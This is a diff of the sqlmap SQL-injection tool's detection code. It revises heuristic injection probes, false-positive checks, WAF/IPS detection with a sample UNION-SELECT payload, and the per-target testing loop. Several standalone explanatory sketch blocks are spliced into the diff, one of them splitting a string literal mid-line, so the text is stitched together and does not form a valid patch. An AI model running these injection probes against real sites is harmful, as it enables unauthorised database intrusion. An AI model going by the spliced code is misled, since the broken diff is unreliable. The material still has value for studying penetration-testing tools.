FROM_DUMMY_TABLE.get(dbms, ""), randStr2)): retVal = dbms @@ -714,6 +817,8 @@ def heuristicCheckDbms(injection): infoMsg += "could be '%s' " % retVal logger.info(infoMsg) + kb.heuristicExtendedDbms = retVal + return retVal def checkFalsePositives(injection): @@ -721,7 +826,7 @@ def checkFalsePositives(injection): Checks for false positives (only in single special cases) """ - retVal = injection + retVal = True if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\ (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title): @@ -747,26 +852,30 @@ def checkFalsePositives(injection): break if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)): - retVal = None + retVal = False break # Just in case if DBMS hasn't properly recovered from previous delayed request if PAYLOAD.TECHNIQUE.BOOLEAN 
not in injection.data: checkBooleanExpression("%d=%d" % (randInt1, randInt2)) - if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): - retVal = None + if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): # this must not be evaluated to True + retVal = False break - elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): - retVal = None + elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): # this must not be evaluated to True + retVal = False break - elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): - retVal = None + elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): # this must be evaluated to True + retVal = False break - if retVal is None: + elif checkBooleanExpression("%d %d" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement) + retVal = False + break + + if not retVal: warnMsg = "false positive or unexploitable injection point detected" logger.warn(warnMsg) @@ -833,8 +942,10 @@ def heuristicCheckSqlInjection(place, parameter): origValue = conf.paramDict[place][parameter] paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place + prefix = "" suffix = "" + randStr = "" if conf.prefix or conf.suffix: if conf.prefix: @@ -843,17 +954,16 @@ def heuristicCheckSqlInjection(place, parameter): if conf.suffix: suffix = conf.suffix - randStr = "" - - while '\'' not in randStr: + while randStr.count('\'') != 1 or randStr.count('\"') != 1: randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET) kb.heuristicMode = True payload = "%s%s%s" % (prefix, randStr, suffix) payload = agent.payload(place, parameter, newValue=payload) - page, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) + kb.heuristicPage = page kb.heuristicMode = False parseFilePaths(page) @@ -875,7 +985,7 @@ def heuristicCheckSqlInjection(place, parameter): if not result: randStr = randomStr() - payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix) + payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) casting = Request.queryPage(payload, place, raise404=False) @@ -889,7 +999,7 @@ def heuristicCheckSqlInjection(place, parameter): if kb.ignoreCasted is None: message = "do you want to skip those kind of cases (and save scanning time)? 
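# Sketch of the strengthened false-positive checks from the hunk above: with three distinct
# random integers a, b, c, a genuine boolean-based injection must evaluate "a=a" and "b=b" as
# True, both "a=c" and "c=b" as False, and a syntactically invalid expression ("c b") must
# not come back True either; any other outcome marks the finding as a false positive or
# unexploitable. ask() stands in for sqlmap's checkBooleanExpression().
import random

def consistent_boolean_injection(ask):
    a, b, c = random.sample(range(1, 10000), 3)
    if not ask("%d=%d" % (a, a)):
        return False
    if ask("%d=%d" % (a, c)) or ask("%d=%d" % (c, b)):
        return False
    if not ask("%d=%d" % (b, b)):
        return False
    if ask("%d %d" % (c, b)):  # invalid statement must not evaluate to True
        return False
    return True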
%s " % ("[Y/n]" if conf.multipleTargets else "[y/N]") - kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N' + kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True) elif result: infoMsg += "be injectable" @@ -903,18 +1013,26 @@ def heuristicCheckSqlInjection(place, parameter): kb.heuristicMode = True - value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()) + randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH) + value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2) payload = "%s%s%s" % (prefix, "'%s" % value, suffix) payload = agent.payload(place, parameter, newValue=payload) - page, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place - if value in (page or ""): + if value.lower() in (page or "").lower(): infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType - infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter + infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter logger.info(infoMsg) + for match in re.finditer(FI_ERROR_REGEX, page or ""): + if randStr1.lower() in match.group(0).lower(): + infoMsg = "heuristic (FI) test shows that %s parameter " % paramType + infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter + logger.info(infoMsg) + break + kb.heuristicMode = False return kb.heuristicTest @@ -974,12 +1092,22 @@ def checkDynamicContent(firstPage, secondPage): logger.critical(warnMsg) return - seqMatcher = getCurrentThreadData().seqMatcher - seqMatcher.set_seq1(firstPage) - seqMatcher.set_seq2(secondPage) + if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)): + ratio = None + else: + try: + seqMatcher = getCurrentThreadData().seqMatcher + seqMatcher.set_seq1(firstPage) + seqMatcher.set_seq2(secondPage) + ratio = seqMatcher.quick_ratio() + except MemoryError: + ratio = None + + if ratio is None: + kb.skipSeqMatcher = True # In case of an intolerable difference turn on dynamicity removal engine - if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND: + elif ratio <= UPPER_RATIO_BOUND: findDynamicContent(firstPage, secondPage) count = 0 @@ -998,7 +1126,7 @@ def checkDynamicContent(firstPage, secondPage): warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) - secondPage, _ = Request.queryPage(content=True) + secondPage, _, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) def checkStability(): @@ -1021,7 +1149,7 @@ def checkStability(): delay = max(0, min(1, delay)) time.sleep(delay) - secondPage, _ = Request.queryPage(content=True, raise404=False) + secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False) if kb.redirectChoice: return None @@ -1049,19 +1177,19 @@ def checkStability(): logger.warn(warnMsg) message = "how do you want to proceed? 
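# Standalone sketch of the page-similarity comparison behind checkDynamicContent() above:
# two responses for the same request are compared with difflib's quick_ratio(); overly large
# pages (or a MemoryError) skip the comparison entirely, and a ratio at or below the upper
# bound switches on the dynamic-content removal engine. The limits below only mirror the
# roles of MAX_DIFFLIB_SEQUENCE_LENGTH and UPPER_RATIO_BOUND, their exact values are
# illustrative.
import difflib

MAX_COMPARE_LENGTH = 10 * 1024 * 1024
UPPER_BOUND = 0.98

def pages_look_dynamic(first, second):
    if any(len(_) > MAX_COMPARE_LENGTH for _ in (first, second)):
        return None  # too large to compare reliably
    try:
        ratio = difflib.SequenceMatcher(None, first, second).quick_ratio()
    except MemoryError:
        return None
    return ratio <= UPPER_BOUND

print(pages_look_dynamic("<html>same</html>", "<html>same</html>"))  # False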
[(C)ontinue/(s)tring/(r)egex/(q)uit] " - test = readInput(message, default="C") + choice = readInput(message, default='C').upper() - if test and test[0] in ("q", "Q"): + if choice == 'Q': raise SqlmapUserQuitException - elif test and test[0] in ("s", "S"): + elif choice == 'S': showStaticWords(firstPage, secondPage) message = "please enter value for parameter 'string': " - test = readInput(message) + string = readInput(message) - if test: - conf.string = test + if string: + conf.string = string if kb.nullConnection: debugMsg = "turning off NULL connection " @@ -1073,12 +1201,12 @@ def checkStability(): errMsg = "Empty value supplied" raise SqlmapNoneDataException(errMsg) - elif test and test[0] in ("r", "R"): + elif choice == 'R': message = "please enter value for parameter 'regex': " - test = readInput(message) + regex = readInput(message) - if test: - conf.regex = test + if regex: + conf.regex = regex if kb.nullConnection: debugMsg = "turning off NULL connection " @@ -1103,7 +1231,7 @@ def checkString(): infoMsg += "target URL page content" logger.info(infoMsg) - page, headers = Request.queryPage(content=True) + page, headers, _ = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if conf.string not in rawResponse: @@ -1122,7 +1250,7 @@ def checkRegexp(): infoMsg += "the target URL page content" logger.info(infoMsg) - page, headers = Request.queryPage(content=True) + page, headers, _ = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if not re.search(conf.regexp, rawResponse, re.I | re.M): @@ -1139,12 +1267,20 @@ def checkWaf(): Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse """ - if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)): + if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)): return None - dbmMsg = "heuristically checking if the target is protected by " - dbmMsg += "some kind of WAF/IPS/IDS" - logger.debug(dbmMsg) + _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True) + if _ is not None: + if _: + warnMsg = "previous heuristics detected that the target " + warnMsg += "is protected by some kind of WAF/IPS/IDS" + logger.critical(warnMsg) + return _ + + infoMsg = "checking if the target is protected by " + infoMsg += "some kind of WAF/IPS/IDS" + logger.info(infoMsg) retVal = False payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) @@ -1152,12 +1288,16 @@ def checkWaf(): value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload)) + pushValue(conf.timeout) + conf.timeout = IDS_WAF_CHECK_TIMEOUT + try: retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO except SqlmapConnectionException: retVal = True finally: kb.matchRatio = None + conf.timeout = popValue() if retVal: warnMsg = "heuristics detected that the target " @@ -1167,17 +1307,25 @@ def checkWaf(): if not conf.identifyWaf: message = "do you want sqlmap to try to detect backend " message += "WAF/IPS/IDS? [y/N] " - output = readInput(message, default="N") - if output and output[0] in ("Y", "y"): + if readInput(message, default='N', boolean=True): conf.identifyWaf = True + if conf.timeout == defaults.timeout: + logger.warning("dropping timeout to %d seconds (i.e. 
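# Minimal sketch of the WAF/IPS/IDS heuristic used by checkWaf() above: a throw-away GET
# parameter is filled with a deliberately noisy attack payload and the response is compared
# against the original page; a similarity ratio below a threshold (the role played by
# IDS_WAF_CHECK_RATIO) suggests the request was intercepted. The payload string is only
# representative, and fetch() stands in for Request.queryPage() with a temporarily lowered
# timeout (the pushValue()/popValue() dance in the hunk above).
import difflib
import random
import string

NOISY_PAYLOAD = "AND 1=1 UNION ALL SELECT NULL,table_name FROM information_schema.tables WHERE 2>1-- -"
CHECK_RATIO = 0.5

def looks_waf_protected(url, fetch, original_page):
    param = "".join(random.choice(string.ascii_lowercase) for _ in range(8))
    probe = "%s%s%s=%d %s" % (url, '&' if '?' in url else '?', param, random.randint(1, 10000), NOISY_PAYLOAD)
    page = fetch(probe) or ""
    return difflib.SequenceMatcher(None, original_page, page).quick_ratio() < CHECK_RATIO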
'--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT)) + conf.timeout = IDS_WAF_CHECK_TIMEOUT + + hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True) + return retVal def identifyWaf(): if not conf.identifyWaf: return None + if not kb.wafFunctions: + setWafFunctions() + kb.testMode = True infoMsg = "using WAF scripts to detect " @@ -1201,36 +1349,38 @@ def identifyWaf(): kb.redirectChoice = popValue() return page or "", headers or {}, code - retVal = False + retVal = [] for function, product in kb.wafFunctions: try: - logger.debug("checking for WAF/IDS/IPS product '%s'" % product) + logger.debug("checking for WAF/IPS/IDS product '%s'" % product) found = function(_) except Exception, ex: errMsg = "exception occurred while running " - errMsg += "WAF script for '%s' ('%s')" % (product, ex) + errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex)) logger.critical(errMsg) found = False if found: - retVal = product - break + errMsg = "WAF/IPS/IDS identified as '%s'" % product + logger.critical(errMsg) + + retVal.append(product) if retVal: - errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal - errMsg += "consider usage of tamper scripts (option '--tamper')" - logger.critical(errMsg) - message = "are you sure that you want to " message += "continue with further target testing? [y/N] " - output = readInput(message, default="N") + choice = readInput(message, default='N', boolean=True) - if output and output[0] not in ("Y", "y"): + if not conf.tamper: + warnMsg = "please consider usage of tamper scripts (option '--tamper')" + singleTimeWarnMessage(warnMsg) + + if not choice: raise SqlmapUserQuitException else: - warnMsg = "no WAF/IDS/IPS product has been identified" + warnMsg = "WAF/IPS/IDS product hasn't been identified" logger.warn(warnMsg) kb.testType = None @@ -1258,7 +1408,7 @@ def checkNullConnection(): if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.HEAD - infoMsg = "NULL connection is supported with HEAD header" + infoMsg = "NULL connection is supported with HEAD method (Content-Length)" logger.info(infoMsg) else: page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"}) @@ -1266,7 +1416,7 @@ def checkNullConnection(): if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}): kb.nullConnection = NULLCONNECTION.RANGE - infoMsg = "NULL connection is supported with GET header " + infoMsg = "NULL connection is supported with GET method (Range)" infoMsg += "'%s'" % kb.nullConnection logger.info(infoMsg) else: @@ -1278,8 +1428,8 @@ def checkNullConnection(): infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) - except SqlmapConnectionException, errMsg: - errMsg = getUnicode(errMsg) + except SqlmapConnectionException, ex: + errMsg = getSafeExString(ex) raise SqlmapConnectionException(errMsg) finally: @@ -1298,7 +1448,7 @@ def checkConnection(suppressOutput=False): raise SqlmapConnectionException(errMsg) except socket.error, ex: errMsg = "problem occurred while " - errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message) + errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: @@ -1307,7 +1457,7 @@ def checkConnection(suppressOutput=False): try: kb.originalPageTime = time.time() - page, _ = Request.queryPage(content=True, noteResponseTime=False) + page, headers, _ = 
Request.queryPage(content=True, noteResponseTime=False) kb.originalPage = kb.pageTemplate = page kb.errorIsNone = False @@ -1326,7 +1476,7 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True - except SqlmapConnectionException, errMsg: + except SqlmapConnectionException, ex: if conf.ipv6: warnMsg = "check connection to a provided " warnMsg += "IPv6 address with a tool like ping6 " @@ -1336,14 +1486,14 @@ def checkConnection(suppressOutput=False): singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): - errMsg = getUnicode(errMsg) + errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.multipleTargets: return False msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] " - if readInput(msg, default="Y") not in ("n", "N"): + if readInput(msg, default='Y', boolean=True): raise SqlmapSilentQuitException else: kb.ignoreNotFound = True @@ -1352,5 +1502,12 @@ def checkConnection(suppressOutput=False): return True +def checkInternet(): + content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0] + return CHECK_INTERNET_VALUE in (content or "") + def setVerbosity(): # Cross-linked function raise NotImplementedError + +def setWafFunctions(): # Cross-linked function + raise NotImplementedError diff --git a/lib/controller/controller.py b/lib/controller/controller.py index d5793767c..777d8ba6e 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re +import time from lib.controller.action import action from lib.controller.checks import checkSqlInjection @@ -15,6 +16,7 @@ from lib.controller.checks import checkStability from lib.controller.checks import checkString from lib.controller.checks import checkRegexp from lib.controller.checks import checkConnection +from lib.controller.checks import checkInternet from lib.controller.checks import checkNullConnection from lib.controller.checks import checkWaf from lib.controller.checks import heuristicCheckSqlInjection @@ -24,7 +26,7 @@ from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import intersect @@ -45,6 +47,7 @@ from lib.core.enums import CONTENT_TYPE from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTPMETHOD +from lib.core.enums import NOTE from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapBaseException @@ -64,7 +67,6 @@ from lib.core.settings import REFERER_ALIASES from lib.core.settings import USER_AGENT_ALIASES from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv -from thirdparty.pagerank.pagerank import get_pagerank def _selectInjection(): """ @@ -116,11 +118,11 @@ def _selectInjection(): message += "\n" message += "[q] Quit" - select = readInput(message, default="0") + choice = readInput(message, default='0').upper() - if select.isdigit() and 
int(select) < len(kb.injections) and int(select) >= 0: - index = int(select) - elif select[0] in ("Q", "q"): + if choice.isdigit() and int(choice) < len(kb.injections) and int(choice) >= 0: + index = int(choice) + elif choice == 'Q': raise SqlmapUserQuitException else: errMsg = "invalid choice" @@ -140,7 +142,7 @@ def _formatInjection(inj): if inj.place == PLACE.CUSTOM_HEADER: payload = payload.split(',', 1)[1] if stype == PAYLOAD.TECHNIQUE.UNION: - count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 + count = re.sub(r"(?i)(\(.+\))|(\blimit[^a-z]+)", "", sdata.payload).count(',') + 1 title = re.sub(r"\d+ to \d+", str(count), title) vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) if count == 1: @@ -161,10 +163,11 @@ def _showInjections(): else: header = "sqlmap resumed the following injection point(s) from stored session" - if hasattr(conf, "api"): + if conf.api: + conf.dumper.string("", {"url": conf.url, "query": conf.parameters.get(PLACE.GET), "data": conf.parameters.get(PLACE.POST)}, content_type=CONTENT_TYPE.TARGET) conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES) else: - data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n") + data = "".join(set(_formatInjection(_) for _ in kb.injections)).rstrip("\n") conf.dumper.string(header, data) if conf.tamper: @@ -182,8 +185,8 @@ def _randomFillBlankFields(value): if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value): message = "do you want to fill blank fields with random values? [Y/n] " - test = readInput(message, default="Y") - if not test or test[0] in ("y", "Y"): + + if readInput(message, default='Y', boolean=True): for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal): item = match.group("result") if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item): @@ -209,9 +212,8 @@ def _saveToHashDB(): _[key].data.update(injection.data) hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True) - _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set() - _.update(kb.absFilePaths) - hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True) + _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) + hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True) if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS): hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True) @@ -224,25 +226,25 @@ def _saveToResultsFile(): return results = {} - techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE))) + techniques = dict((_[1], _[0]) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE)) - for inj in kb.injections: - if inj.place is None or inj.parameter is None: + for injection in kb.injections + kb.falsePositives: + if injection.place is None or injection.parameter is None: continue - key = (inj.place, inj.parameter) + key = (injection.place, injection.parameter, ';'.join(injection.notes)) if key not in results: results[key] = [] - results[key].extend(inj.data.keys()) + results[key].extend(injection.data.keys()) for key, value in results.items(): - place, parameter = key - line = "%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), os.linesep) + place, parameter, notes = key + line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() 
for _ in sorted(value)), notes, os.linesep) conf.resultsFP.writelines(line) if not results: - line = "%s,,,%s" % (conf.url, os.linesep) + line = "%s,,,,%s" % (conf.url, os.linesep) conf.resultsFP.writelines(line) def start(): @@ -276,6 +278,21 @@ def start(): for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets: try: + + if conf.checkInternet: + infoMsg = "[INFO] checking for Internet connection" + logger.info(infoMsg) + + if not checkInternet(): + warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X") + dataToStdout(warnMsg) + + while not checkInternet(): + dataToStdout('.') + time.sleep(5) + + dataToStdout("\n") + conf.url = targetUrl conf.method = targetMethod.upper() if targetMethod else targetMethod conf.data = targetData @@ -305,7 +322,9 @@ def start(): message = "SQL injection vulnerability has already been detected " message += "against '%s'. Do you want to skip " % conf.hostname message += "further tests involving it? [Y/n]" - kb.skipVulnHost = readInput(message, default="Y").upper() != 'N' + + kb.skipVulnHost = readInput(message, default='Y', boolean=True) + testSqlInj = not kb.skipVulnHost if not testSqlInj: @@ -316,10 +335,10 @@ def start(): if conf.multipleTargets: hostCount += 1 - if conf.forms: - message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl) + if conf.forms and conf.method: + message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl) else: - message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "") + message = "URL %d:\n%s %s" % (hostCount, HTTPMETHOD.GET, targetUrl) if conf.cookie: message += "\nCookie: %s" % conf.cookie @@ -327,14 +346,18 @@ def start(): if conf.data is not None: message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "") - if conf.forms: + if conf.forms and conf.method: if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1: continue message += "\ndo you want to test this form? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): + if choice == 'N': + continue + elif choice == 'Q': + break + else: if conf.method != HTTPMETHOD.GET: message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "") conf.data = readInput(message, default=conf.data) @@ -352,21 +375,14 @@ def start(): parseTargetUrl() - elif test[0] in ("n", "N"): - continue - elif test[0] in ("q", "Q"): - break - else: message += "\ndo you want to test this URL? 
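# Sketch of the connectivity gate added to start() above: checkInternet() downloads a known
# page and looks for an expected token in it, and the per-target loop simply polls it every
# few seconds until the connection comes back. The URL/token pair below is an assumption for
# illustration only; sqlmap keeps its own values in CHECK_INTERNET_ADDRESS and
# CHECK_INTERNET_VALUE.
import sys
import time
try:
    from urllib.request import urlopen  # Python 3
except ImportError:
    from urllib2 import urlopen         # Python 2

CHECK_ADDRESS = "https://example.com/"   # assumed stand-in address
CHECK_VALUE = "Example Domain"           # assumed stand-in token

def check_internet():
    try:
        content = urlopen(CHECK_ADDRESS, timeout=10).read().decode("utf8", "ignore")
    except Exception:
        content = ""
    return CHECK_VALUE in content

def wait_for_internet(delay=5):
    while not check_internet():
        sys.stdout.write('.')
        sys.stdout.flush()
        time.sleep(delay)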
[Y/n/q]" - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - pass - elif test[0] in ("n", "N"): + if choice == 'N': dataToStdout(os.linesep) continue - elif test[0] in ("q", "Q"): + elif choice == 'Q': break infoMsg = "testing URL '%s'" % targetUrl @@ -421,6 +437,7 @@ def start(): skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None)) + skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True)) @@ -463,7 +480,13 @@ def start(): infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter) logger.info(infoMsg) - elif parameter in conf.skip: + elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip: + testSqlInj = False + + infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) + logger.info(infoMsg) + + elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)): testSqlInj = False infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) @@ -486,7 +509,7 @@ def start(): check = checkDynParam(place, parameter, value) if not check: - warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter) + warnMsg = "%s parameter '%s' does not appear to be dynamic" % (paramType, parameter) logger.warn(warnMsg) if conf.skipStatic: @@ -520,24 +543,30 @@ def start(): injection = checkSqlInjection(place, parameter, value) proceed = not kb.endDetection + injectable = False - if injection is not None and injection.place is not None: - kb.injections.append(injection) + if getattr(injection, "place", None) is not None: + if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes: + kb.falsePositives.append(injection) + else: + injectable = True - # In case when user wants to end detection phase (Ctrl+C) - if not proceed: - break + kb.injections.append(injection) - msg = "%s parameter '%s' " % (injection.place, injection.parameter) - msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] " - test = readInput(msg, default="N") + # In case when user wants to end detection phase (Ctrl+C) + if not proceed: + break - if test[0] not in ("y", "Y"): - proceed = False - paramKey = (conf.hostname, conf.path, None, None) - kb.testedParams.add(paramKey) - else: - warnMsg = "%s parameter '%s' is not " % (paramType, parameter) + msg = "%s parameter '%s' " % (injection.place, injection.parameter) + msg += "is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] " + + if not readInput(msg, default='N', boolean=True): + proceed = False + paramKey = (conf.hostname, conf.path, None, None) + kb.testedParams.add(paramKey) + + if not injectable: + warnMsg = "%s parameter '%s' does not seem to be " % (paramType, parameter) warnMsg += "injectable" logger.warn(warnMsg) @@ -585,24 +614,24 @@ def start(): if not conf.string and not conf.notString and not conf.regexp: errMsg += " Also, you can try to rerun by providing " errMsg += "either a valid value for option '--string' " - errMsg += "(or '--regexp')" + errMsg += "(or '--regexp')." elif conf.string: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--string' as perhaps the string you " errMsg += "have chosen does not match " - errMsg += "exclusively True responses" + errMsg += "exclusively True responses." elif conf.regexp: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--regexp' as perhaps the regular " errMsg += "expression that you have chosen " - errMsg += "does not match exclusively True responses" + errMsg += "does not match exclusively True responses." if not conf.tamper: errMsg += " If you suspect that there is some kind of protection mechanism " errMsg += "involved (e.g. WAF) maybe you could retry " errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')" - raise SqlmapNotVulnerableException(errMsg) + raise SqlmapNotVulnerableException(errMsg.rstrip('.')) else: # Flush the flag kb.testMode = False @@ -615,9 +644,7 @@ def start(): if kb.injection.place is not None and kb.injection.parameter is not None: if conf.multipleTargets: message = "do you want to exploit this SQL injection? [Y/n] " - exploit = readInput(message, default="Y") - - condition = not exploit or exploit[0] in ("y", "Y") + condition = readInput(message, default='Y', boolean=True) else: condition = True @@ -630,13 +657,11 @@ def start(): logger.warn(warnMsg) message = "do you want to skip to the next target in list? 
